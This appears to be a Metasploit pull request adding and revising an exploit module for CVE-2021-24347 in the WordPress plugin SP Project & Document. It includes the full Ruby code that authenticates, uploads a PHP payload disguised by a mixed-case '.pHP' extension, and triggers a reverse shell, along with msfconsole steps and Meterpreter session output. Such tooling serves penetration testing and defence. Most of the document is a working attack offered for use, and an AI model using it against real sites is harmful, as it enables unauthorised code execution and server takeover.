### PR TITLE
[CVE-2021-24347] Wordpress plugin SP Project & Document < 4.22 - Authenticated RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
@@ -4,7 +4,6 @@
 
 This module allows an attacker with a privileged Wordpress account to launch a reverse shell
 due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
-This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
 Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
 making possible to upload `.pHP` files for instance.
 Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/my_payload.php`

--- a/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
@@ -13,7 +13,7 @@ Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads
 
 You can easily install Wordpress with Docker as explained [there]
 (https://upcloud.com/community/tutorials/wordpress-with-docker/).
-Then, you can download a vulnerable version of Backup Guard plugin from [there]
+Then, you can download a vulnerable version of SP Project & Document plugin from [there]
 (https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip)
 and install it on your Wordpress website through the plugin page : Add New > Upload Plugin > Browse...
 

--- a/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
@@ -1,0 +1,75 @@
+## Vulnerable Application
+
+### Description
+
+This module allows an attacker with a privileged Wordpress account to launch a reverse shell
+due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
+This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
+Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
+making possible to upload `.pHP` files for instance.
+Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/my_payload.php`
+
+### Installation
+
+You can easily install Wordpress with Docker as explained [there]
+(https://upcloud.com/community/tutorials/wordpress-with-docker/).
+Then, you can download a vulnerable version of Backup Guard plugin from [there]
+(https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip)
+and install it on your Wordpress website through the plugin page : Add New > Upload Plugin > Browse...
+
+## Verification Steps
+
+List the steps needed to make sure this thing works
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/wordpress_plugin_sp_project_document_rce`
+3. `set USERNAME <admin_username>`
+4. `set PASSWORD <admin_password>`
+5. `set TARGETURI <base_path_rconfig>` if the base path of the Wordpress website is different from `/`
+6. `check` to check if the targeted Wordpress website is vulnerable
+7. `run` the module to exploit the vulnerability and start a reverse shell
+
+## Options
+
+### USERNAME
+
+Set the USERNAME of your admin account.
+
+### PASSWORD
+
+Set the PASSWORD of your admin account.
+
+## Scenarios
+
+This module was successfully tested on Debian 10 with Wordpress 5.7.2 and SP Project & Document 4.21.
+See the following output :
+
+```
+msf6 > use wordpress_plugin_sp_project_document_manager
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(wordpress_plugin_sp_project_document_manager) > set rhost 192.168.1.35
+rhost => 192.168.1.35
+msf6 exploit(wordpress_plugin_sp_project_document_manager) > set username admin
+username => admin
+msf6 exploit(wordpress_plugin_sp_project_document_manager) > set password adminocd2021password => adminocd2021
+msf6 exploit(wordpress_plugin_sp_project_document_manager) > run
+
+[*] Started reverse TCP handler on 192.168.1.28:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] Version 4.21 of plugin SP Project & Document Manager found !
+[+] The target is vulnerable. This version of SP Project & Document Manager is vulnerable !
+[*] Uploading file 'ejtfh.pHP' containing the payload...
+[*] Sending stage (39282 bytes) to 192.168.1.35
+[*] Meterpreter session 4 opened (192.168.1.28:4444 -> 192.168.1.35:59938) at 2021-07-09 11:41:25 +0200
+[*] Triggering the payload ...
+[*] Sending stage (39282 bytes) to 192.168.1.35
+[*] Meterpreter session 5 opened (192.168.1.28:4444 -> 192.168.1.35:59940) at 2021-07-09 11:41:45 +0200
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo 
+Computer    : 217a92584fbf
+OS          : Linux 217a92584fbf 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
+Meterpreter : php/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
@@ -25,7 +25,7 @@ List the steps needed to make sure this thing works
 2. `use exploit/multi/http/wordpress_plugin_sp_project_document_rce`
 3. `set USERNAME <admin_username>`
 4. `set PASSWORD <admin_password>`
-5. `set TARGETURI <base_path_rconfig>` if the base path of the Wordpress website is different from `/`
+5. `set TARGETURI <base_path_wordpress>` if the base path of the Wordpress website is different from `/`
 6. `check` to check if the targeted Wordpress website is vulnerable
 7. `run` the module to exploit the vulnerability and start a reverse shell
 

--- a/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
@@ -51,7 +51,7 @@ msf6 exploit(wordpress_plugin_sp_project_document_manager) > set rhost 192.168.1
 rhost => 192.168.1.35
 msf6 exploit(wordpress_plugin_sp_project_document_manager) > set username admin
 username => admin
-msf6 exploit(wordpress_plugin_sp_project_document_manager) > set password adminocd2021password => adminocd2021
+msf6 exploit(wordpress_plugin_sp_project_document_manager) > set password your_best_password => your_best_password
 msf6 exploit(wordpress_plugin_sp_project_document_manager) > run
 
 [*] Started reverse TCP handler on 192.168.1.28:4444 

--- a/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
@@ -18,7 +18,6 @@ and install it on your Wordpress website through the plugin page : Add New > Upl
 
 ## Verification Steps
 
-List the steps needed to make sure this thing works
 
 1. Start `msfconsole`
 2. `use exploit/multi/http/wordpress_plugin_sp_project_document_rce`

--- a/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
@@ -12,7 +12,7 @@ Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads
 
 You can easily install Wordpress with Docker as explained [there]
 (https://upcloud.com/community/tutorials/wordpress-with-docker/).
-Then, you can download a vulnerable version of SP Project & Document plugin from [there]
+Then, you can download a vulnerable version of SP Project & Document plugin from [here]
 (https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip)
 and install it on your Wordpress website through the plugin page : Add New > Upload Plugin > Browse...
 

--- a/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_plugin_sp_project_document_rce.md
@@ -51,7 +51,8 @@ msf6 exploit(wordpress_plugin_sp_project_document_manager) > set rhost 192.168.1
 rhost => 192.168.1.35
 msf6 exploit(wordpress_plugin_sp_project_document_manager) > set username admin
 username => admin
-msf6 exploit(wordpress_plugin_sp_project_document_manager) > set password your_best_password => your_best_password
+msf6 exploit(wordpress_plugin_sp_project_document_manager) > set password your_best_password
+password => your_best_password
 msf6 exploit(wordpress_plugin_sp_project_document_manager) > run
 
 [*] Started reverse TCP handler on 192.168.1.28:4444 

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -21,7 +21,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module allows an attacker with a privileged Wordpress account to launch a reverse shell
           due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
-          This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
           Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
           making possible to upload `.pHP` files for instance.
           Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -1,3 +1,5 @@
+# frozen_string_literal: true
+
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -9,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -31,22 +34,22 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'References' =>
           [
-            ['EDB', '50115'],
-            ['CVE', '2021-24347']
+            %w[EDB 50115],
+            %w[CVE 2021-24347]
           ],
-        'Platform' => [ 'php' ],
+        'Platform' => ['php'],
         'Arch' => ARCH_PHP,
         'Targets' =>
         [
-          [ 'Wordpress SP Project & Document < 4.22', {}]
+          ['Wordpress SP Project & Document < 4.22', {}]
         ],
         'Privileged' => true,
         'DisclosureDate' => '2021-06-14',
         'Notes' =>
           {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
+            'Stability' => [CRASH_SAFE],
+            'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+            'Reliability' => [REPEATABLE_SESSION]
           }
       )
     )
@@ -59,10 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    datastore['WPCHECK'] = true
-    unless wordpress_and_online?
-      fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
-    end
+    return CheckCode::Unknown('Server not online or not detected as wordpress') unless wordpress_and_online?
 
     cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
     if cookie
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
     user_id = r.body.to_s.match(%r{<option value='(\d+)'>#{datastore['USERNAME']}</option>})
-    fail_with(Failure::UnexpectedReply, "Can't find user id on plugin page") unless (user_id && user_id[1])
+    fail_with(Failure::UnexpectedReply, "Can't find user id on plugin page") unless user_id && user_id[1]
     user_id[1]
   end
 
@@ -117,22 +117,15 @@ class MetasploitModule < Msf::Exploit::Remote
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
     )
 
+    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 302
+    register_files_for_cleanup(payload_name.downcase!)
+
+    print_status('Triggering the payload ...')
+
     send_request_cgi(
       'method' => 'GET',
       'cookie' => cookie,
-      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name.downcase!}")
+      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name}")
     )
-
-    if r&.code == 302
-
-      print_status('Triggering the payload ...')
-      send_request_cgi(
-        'method' => 'GET',
-        'cookie' => cookie,
-        'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name}")
-      )
-    else
-      fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file")
-    end
   end
 end

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -1,0 +1,195 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution',
+        'Description' => %q{
+          This module allows an attacker with a privileged Wordpress account to launch a reverse shell
+          due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
+          This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
+          Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
+          making possible to upload `.pHP` files for instance.
+          Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/my_payload.php`
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'RON JOST', # Exploit-db
+            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+          ],
+        'References' =>
+          [
+            ['EDB', '50115'],
+            ['CVE', '2021-24347']
+          ],
+        'Platform' => [ 'php' ],
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+        [
+          [ 'Wordpress SP Project & Document < 1.6.0', {}]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2021-06-14',
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
+      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
+    ]
+  end
+
+  def authenticate
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/wp-login.php')
+    })
+
+    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+    cookie = r.get_cookies
+    r = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/wp-login.php'),
+      'headers' => {
+        'Origin' => full_uri('')
+      },
+      'cookie' => cookie,
+      'vars_post' => {
+        'log' => datastore['USERNAME'],
+        'pwd' => datastore['PASSWORD'],
+        'wp-submit': 'Log In',
+        testcookie: '1'
+      }
+    )
+
+    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+
+    if r.code == 302
+      return r.get_cookies
+    end
+
+    nil
+  end
+
+  def check
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/wp-login.php')
+    })
+
+    if r&.code == 200
+      cookie = authenticate
+      if cookie
+        r = send_request_cgi({
+          'method' => 'GET',
+          'cookie' => cookie,
+          'uri' => normalize_uri(target_uri.path, '/wp-admin/plugins.php'),
+          'Referer' => full_uri('/wp-admin/users.php')
+        })
+
+        fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+        if r.code == 200
+          version = r.body.to_s.match(%r{data-plugin="sp-client-document-manager/cu.php">.*?Version (\d+.\d+)}m)
+          if version && version[1]
+            print_good("Version #{version[1]} of plugin SP Project & Document Manager found !")
+            if Rex::Version.new(version[1]) < Rex::Version.new('4.22')
+              CheckCode::Vulnerable('This version of SP Project & Document Manager is vulnerable !')
+            else
+              CheckCode::Safe('Only versions of SP Project & Document Manager < 4.22 are vulnerable')
+            end
+          else
+            CheckCode::Safe('Plugin SP Project & Document Manager not found !')
+          end
+        else
+          CheckCode::Unknown("Can't retrieve Wordpress plugins page")
+        end
+      else
+        CheckCode::Unknown('The admin credentials given are wrong !')
+      end
+    else
+      CheckCode::Unknown("Can't access the Wordpress web interface !")
+    end
+  end
+
+  def get_user_id(cookie)
+    r = send_request_cgi({
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
+      'Referer' => full_uri('/wp-admin/users.php'),
+      'vars_get' => {
+        'page' => 'sp-client-document-manager-fileview'
+      }
+    })
+    fail_with Failure::Unknow "Target #{RHOST} could not be reached." unless r
+    user_id = r.body.to_s.match(%r{<option value='(\d+)'>#{datastore['USERNAME']}</option>})
+    fail_with Failure::UnexpectedReply "Can't find user id on plugin page" unless (user_id && user_id[1])
+    user_id[1]
+  end
+
+  def exploit
+    cookie = authenticate
+    fail_with Failure::UnexpectedReply 'Authentication failed' unless cookie
+    user_id = get_user_id(cookie)
+    payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.pHP"
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('a1b3bac1bc', nil, nil, "form-data; name='cdm_upload_file_field'")
+    post_data.add_part("/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}", nil, nil, "form-data; name='_wp_http_referer'")
+    post_data.add_part('exploits', nil, nil, "form-data; name='dlg-upload-name'")
+    post_data.add_part('', 'application/octet-stream', nil, "form-data; name='dlg-upload-file[]'; filename=''")
+    post_data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name='dlg-upload-file[]'; filename='#{payload_name}'")
+    post_data.add_part('', nil, nil, "form-data; name='dlg-upload-notes'")
+    post_data.add_part('Upload', nil, nil, "form-data; name='sp-cdm-community-upload'")
+
+    print_status("Uploading file \'#{payload_name}\' containing the payload...")
+
+    r = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}"),
+      'headers' => {
+        'Origin' => full_uri(''),
+        'Referer' => full_uri("wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}")
+      },
+      'cookie' => cookie,
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    )
+
+    send_request_cgi(
+      'method' => 'GET',
+      'cookie' => cookie,
+      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name.downcase!}")
+    )
+
+    if r&.code == 302
+
+      print_status('Triggering the payload ...')
+      send_request_cgi(
+        'method' => 'GET',
+        'cookie' => cookie,
+        'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name}")
+      )
+    else
+      fail_with Failure::UnexpectedReply "Wasn't able to upload the payload file"
+    end
+  end
+end

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -21,8 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module allows an attacker with a privileged Wordpress account to launch a reverse shell
           due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
-          Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
-          making possible to upload `.pHP` files for instance.
+          The security check only searches for lowercase file extensions such as `.php`, making it possible to upload `.pHP` files for instance.
           Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`
         },
         'License' => MSF_LICENSE,

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
-    fail_with(Failure::UnexpectedReply, 'Authentication failed') unless cookie
+    fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
     user_id = get_user_id(cookie)
     payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.pHP"
 

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -21,6 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           This module allows an attacker with a privileged Wordpress account to launch a reverse shell
           due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
+          This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
           Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
           making possible to upload `.pHP` files for instance.
           Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`
@@ -42,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           ['Wordpress SP Project & Document < 4.22', {}]
         ],
-        'Privileged' => false,
+        'Privileged' => true,
         'DisclosureDate' => '2021-06-14',
         'Notes' =>
           {
@@ -92,7 +93,6 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
     user_id = get_user_id(cookie)
     payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.pHP"
-
     post_data = Rex::MIME::Message.new
     post_data.add_part('a1b3bac1bc', nil, nil, "form-data; name='cdm_upload_file_field'")
     post_data.add_part("/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}", nil, nil, "form-data; name='_wp_http_referer'")
@@ -106,10 +106,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
     r = send_request_cgi(
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, "wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}"),
+      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
       'headers' => {
         'Origin' => full_uri(''),
-        'Referer' => full_uri("wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}")
+        'Referer' => full_uri('wp-admin/admin.php')
+      },
+      'vars_get' => {
+        'page' => 'sp-client-document-manager-fileview',
+        'id' => user_id
       },
       'cookie' => cookie,
       'data' => post_data.to_s,
@@ -117,14 +121,14 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 302
-    register_files_for_cleanup(payload_name.downcase!)
+    register_files_for_cleanup(payload_name.downcase)
 
     print_status('Triggering the payload ...')
 
     send_request_cgi(
       'method' => 'GET',
       'cookie' => cookie,
-      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name}")
+      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name.downcase}")
     )
   end
 end

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           ['Wordpress SP Project & Document < 4.22', {}]
         ],
-        'Privileged' => true,
+        'Privileged' => false,
         'DisclosureDate' => '2021-06-14',
         'Notes' =>
           {

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => ARCH_PHP,
         'Targets' =>
         [
-          [ 'Wordpress SP Project & Document < 1.6.0', {}]
+          [ 'Wordpress SP Project & Document < 4.22', {}]
         ],
         'Privileged' => true,
         'DisclosureDate' => '2021-06-14',

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if cookie
       check_plugin_version_from_readme('sp-client-document-manager', '4.22')
     else
-      CheckCode::Unknown('The admin credentials given are wrong !')
+      CheckCode::Detected('The admin credentials given are wrong !')
     end
   end
 

--- a/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
+++ b/modules/exploits/multi/http/wp_plugin_sp_project_document_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
     super(
@@ -20,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
           This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
           Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
           making possible to upload `.pHP` files for instance.
-          Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/my_payload.php`
+          Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`
         },
         'License' => MSF_LICENSE,
         'Author' =>
@@ -57,75 +58,17 @@ class MetasploitModule < Msf::Exploit::Remote
     ]
   end
 
-  def authenticate
-    r = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '/wp-login.php')
-    })
-
-    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
-    cookie = r.get_cookies
-    r = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '/wp-login.php'),
-      'headers' => {
-        'Origin' => full_uri('')
-      },
-      'cookie' => cookie,
-      'vars_post' => {
-        'log' => datastore['USERNAME'],
-        'pwd' => datastore['PASSWORD'],
-        'wp-submit': 'Log In',
-        testcookie: '1'
-      }
-    )
-
-    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
-
-    if r.code == 302
-      return r.get_cookies
+  def check
+    datastore['WPCHECK'] = true
+    unless wordpress_and_online?
+      fail_with(Failure::Unreachable, 'Server not online or not detected as wordpress')
     end
 
-    nil
-  end
-
-  def check
-    r = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '/wp-login.php')
-    })
-
-    if r&.code == 200
-      cookie = authenticate
-      if cookie
-        r = send_request_cgi({
-          'method' => 'GET',
-          'cookie' => cookie,
-          'uri' => normalize_uri(target_uri.path, '/wp-admin/plugins.php'),
-          'Referer' => full_uri('/wp-admin/users.php')
-        })
-
-        fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
-        if r.code == 200
-          version = r.body.to_s.match(%r{data-plugin="sp-client-document-manager/cu.php">.*?Version (\d+.\d+)}m)
-          if version && version[1]
-            print_good("Version #{version[1]} of plugin SP Project & Document Manager found !")
-            if Rex::Version.new(version[1]) < Rex::Version.new('4.22')
-              CheckCode::Vulnerable('This version of SP Project & Document Manager is vulnerable !')
-            else
-              CheckCode::Safe('Only versions of SP Project & Document Manager < 4.22 are vulnerable')
-            end
-          else
-            CheckCode::Safe('Plugin SP Project & Document Manager not found !')
-          end
-        else
-          CheckCode::Unknown("Can't retrieve Wordpress plugins page")
-        end
-      else
-        CheckCode::Unknown('The admin credentials given are wrong !')
-      end
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    if cookie
+      check_plugin_version_from_readme('sp-client-document-manager', '4.22')
     else
-      CheckCode::Unknown("Can't access the Wordpress web interface !")
+      CheckCode::Unknown('The admin credentials given are wrong !')
     end
   end
 
@@ -139,15 +82,15 @@ class MetasploitModule < Msf::Exploit::Remote
         'page' => 'sp-client-document-manager-fileview'
       }
     })
-    fail_with Failure::Unknow "Target #{RHOST} could not be reached." unless r
+    fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
     user_id = r.body.to_s.match(%r{<option value='(\d+)'>#{datastore['USERNAME']}</option>})
-    fail_with Failure::UnexpectedReply "Can't find user id on plugin page" unless (user_id && user_id[1])
+    fail_with(Failure::UnexpectedReply, "Can't find user id on plugin page") unless (user_id && user_id[1])
     user_id[1]
   end
 
   def exploit
-    cookie = authenticate
-    fail_with Failure::UnexpectedReply 'Authentication failed' unless cookie
+    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
+    fail_with(Failure::UnexpectedReply, 'Authentication failed') unless cookie
     user_id = get_user_id(cookie)
     payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.pHP"
 
@@ -189,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name}")
       )
     else
-      fail_with Failure::UnexpectedReply "Wasn't able to upload the payload file"
+      fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file")
     end
   end
 end


### PR DESCRIPTION
## Vulnerable Application

### Description

This module allows an attacker with a privileged Wordpress account to launch a reverse shell
due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
This is due to an incorrect check of the uploaded file extension which should be of SGBP type.
Indeed, even if it is not possible to upload `.php` files, the security check only works with lowercase
making possible to upload `.pHP` files for instance.
Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/my_payload.php`

### Installation

You can easily install Wordpress with Docker as explained [there]
(https://upcloud.com/community/tutorials/wordpress-with-docker/).
Then, you can download a vulnerable version of SP Project & Document plugin from [there]
(https://downloads.wordpress.org/plugin/sp-client-document-manager.4.21.zip)
and install it on your Wordpress website through the plugin page : Add New > Upload Plugin > Browse...

## Verification Steps

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/multi/http/wordpress_plugin_sp_project_document_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_rconfig>` if the base path of the Wordpress website is different from `/`
6. `check` to check if the targeted Wordpress website is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell

## Options

### USERNAME

Set the USERNAME of your admin account.

### PASSWORD

Set the PASSWORD of your admin account.

## Scenarios

This module was successfully tested on Debian 10 with Wordpress 5.7.2 and SP Project & Document 4.21.
See the following output :

```
msf6 > use wordpress_plugin_sp_project_document_manager
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set rhost 192.168.1.35
rhost => 192.168.1.35
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set username admin
username => admin
msf6 exploit(wordpress_plugin_sp_project_document_manager) > set password your_best_password=> your_best_password
msf6 exploit(wordpress_plugin_sp_project_document_manager) > run

